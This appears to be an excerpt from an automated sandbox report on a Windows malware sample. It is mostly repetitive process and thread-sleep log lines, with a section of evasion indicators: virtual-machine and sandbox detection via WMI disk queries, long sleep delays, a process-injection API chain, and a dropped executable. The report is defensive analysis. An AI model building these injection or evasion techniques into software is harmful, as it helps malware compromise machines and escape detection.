Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to compare user and computer (likely to detect sandboxes)

Source: C:\Windows\System32\dllhost.exe

Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,

7_2_0000000140001868

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5035	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4886	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 2202	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 653	Jump to behavior
Source: C:\Windows\System32\winlogon.exe	Window / User API: threadDelayed 6642	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 8255	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 456	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Window / User API: threadDelayed 497	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 728	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 577	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 8752	Jump to behavior
Source: C:\Windows\System32\dwm.exe	Window / User API: threadDelayed 386	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 556	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 550	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 453	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 535	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 524	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 522	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 515	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 470	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1264	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 463	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 459	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 449	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 452	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 447	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6276
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3487
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 435
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 423
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 419
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 410
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1276
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 386
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 374
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 380
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 379
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 353
Source: C:\Windows\System32\svchost.exe	Window / User API: threadDelayed 1257

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\Windows\$nya-onimai2\MzWhoQ.exe

Jump to dropped file

Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess	graph_7-612
Source: C:\Windows\System32\cmd.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess	graph_7-615
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

Source: C:\Windows\System32\dllhost.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_7-574

Source: C:\Windows\System32\winlogon.exe	API coverage: 6.2 %
Source: C:\Windows\System32\lsass.exe	API coverage: 4.9 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.7 %
Source: C:\Windows\System32\dwm.exe	API coverage: 6.2 %
Source: C:\Windows\System32\cmd.exe	API coverage: 4.5 %
Source: C:\Windows\System32\conhost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.0 %
Source: C:\Windows\System32\svchost.exe	API coverage: 8.1 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.5 %
Source: C:\Windows\System32\svchost.exe	API coverage: 4.2 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148	Thread sleep count: 5035 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7148	Thread sleep count: 4886 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1008	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dllhost.exe TID: 7128	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 1920	Thread sleep count: 2202 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 1920	Thread sleep time: -2202000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 1912	Thread sleep count: 653 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 1912	Thread sleep time: -65300s >= -30000s	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 1920	Thread sleep count: 6642 > 30	Jump to behavior
Source: C:\Windows\System32\winlogon.exe TID: 1920	Thread sleep time: -6642000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 4348	Thread sleep count: 8255 > 30	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 4348	Thread sleep time: -8255000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 3088	Thread sleep count: 456 > 30	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 3088	Thread sleep time: -45600s >= -30000s	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 4348	Thread sleep count: 497 > 30	Jump to behavior
Source: C:\Windows\System32\lsass.exe TID: 4348	Thread sleep time: -497000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1504	Thread sleep count: 728 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1504	Thread sleep time: -728000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1516	Thread sleep count: 577 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1516	Thread sleep time: -57700s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 4260	Thread sleep count: 8752 > 30	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 4260	Thread sleep time: -8752000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 2508	Thread sleep count: 386 > 30	Jump to behavior
Source: C:\Windows\System32\dwm.exe TID: 2508	Thread sleep time: -38600s >= -30000s	Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 7772	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\cmd.exe TID: 7776	Thread sleep time: -33000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6328	Thread sleep count: 556 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6328	Thread sleep time: -55600s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3552	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5944	Thread sleep count: 329 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5944	Thread sleep time: -32900s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6204	Thread sleep count: 133 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6204	Thread sleep time: -133000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3952	Thread sleep count: 550 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3952	Thread sleep time: -55000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4484	Thread sleep count: 453 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4484	Thread sleep time: -45300s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3896	Thread sleep count: 151 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3896	Thread sleep time: -151000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4580	Thread sleep count: 535 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4580	Thread sleep time: -53500s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6376	Thread sleep count: 524 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6376	Thread sleep time: -52400s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5264	Thread sleep count: 156 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5264	Thread sleep time: -156000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6504	Thread sleep count: 522 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6504	Thread sleep time: -52200s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6560	Thread sleep count: 158 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6560	Thread sleep time: -158000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5956	Thread sleep count: 515 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5956	Thread sleep time: -51500s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6300	Thread sleep count: 166 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6300	Thread sleep time: -166000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5732	Thread sleep count: 470 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5732	Thread sleep time: -47000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2376	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2376	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5580	Thread sleep count: 1264 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5580	Thread sleep time: -126400s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5572	Thread sleep count: 142 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5572	Thread sleep time: -142000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4704	Thread sleep count: 463 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4704	Thread sleep time: -46300s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4304	Thread sleep count: 162 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4304	Thread sleep time: -162000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4864	Thread sleep count: 459 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4864	Thread sleep time: -45900s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5188	Thread sleep count: 168 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5188	Thread sleep time: -168000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5204	Thread sleep count: 449 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5204	Thread sleep time: -44900s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6200	Thread sleep count: 147 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6200	Thread sleep time: -147000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5628	Thread sleep count: 452 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5628	Thread sleep time: -45200s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6124	Thread sleep count: 150 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6124	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4048	Thread sleep count: 447 > 30	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4048	Thread sleep time: -44700s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1056	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2628	Thread sleep count: 162 > 30
Source: C:\Windows\System32\svchost.exe TID: 2628	Thread sleep time: -162000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2608	Thread sleep count: 435 > 30
Source: C:\Windows\System32\svchost.exe TID: 2608	Thread sleep time: -43500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6964	Thread sleep count: 171 > 30
Source: C:\Windows\System32\svchost.exe TID: 6964	Thread sleep time: -171000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5336	Thread sleep count: 423 > 30
Source: C:\Windows\System32\svchost.exe TID: 5336	Thread sleep time: -42300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4424	Thread sleep count: 160 > 30
Source: C:\Windows\System32\svchost.exe TID: 4424	Thread sleep time: -160000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5260	Thread sleep count: 419 > 30
Source: C:\Windows\System32\svchost.exe TID: 5260	Thread sleep time: -41900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6652	Thread sleep count: 410 > 30
Source: C:\Windows\System32\svchost.exe TID: 6652	Thread sleep time: -41000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5372	Thread sleep count: 185 > 30
Source: C:\Windows\System32\svchost.exe TID: 5372	Thread sleep time: -185000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 700	Thread sleep count: 1276 > 30
Source: C:\Windows\System32\svchost.exe TID: 700	Thread sleep time: -127600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3672	Thread sleep count: 386 > 30
Source: C:\Windows\System32\svchost.exe TID: 3672	Thread sleep time: -38600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2332	Thread sleep count: 374 > 30
Source: C:\Windows\System32\svchost.exe TID: 2332	Thread sleep time: -37400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3924	Thread sleep count: 380 > 30
Source: C:\Windows\System32\svchost.exe TID: 3924	Thread sleep time: -38000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1588	Thread sleep count: 159 > 30
Source: C:\Windows\System32\svchost.exe TID: 1588	Thread sleep time: -159000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1988	Thread sleep count: 379 > 30
Source: C:\Windows\System32\svchost.exe TID: 1988	Thread sleep time: -37900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1848	Thread sleep count: 349 > 30
Source: C:\Windows\System32\svchost.exe TID: 1848	Thread sleep time: -34900s >= -30000s
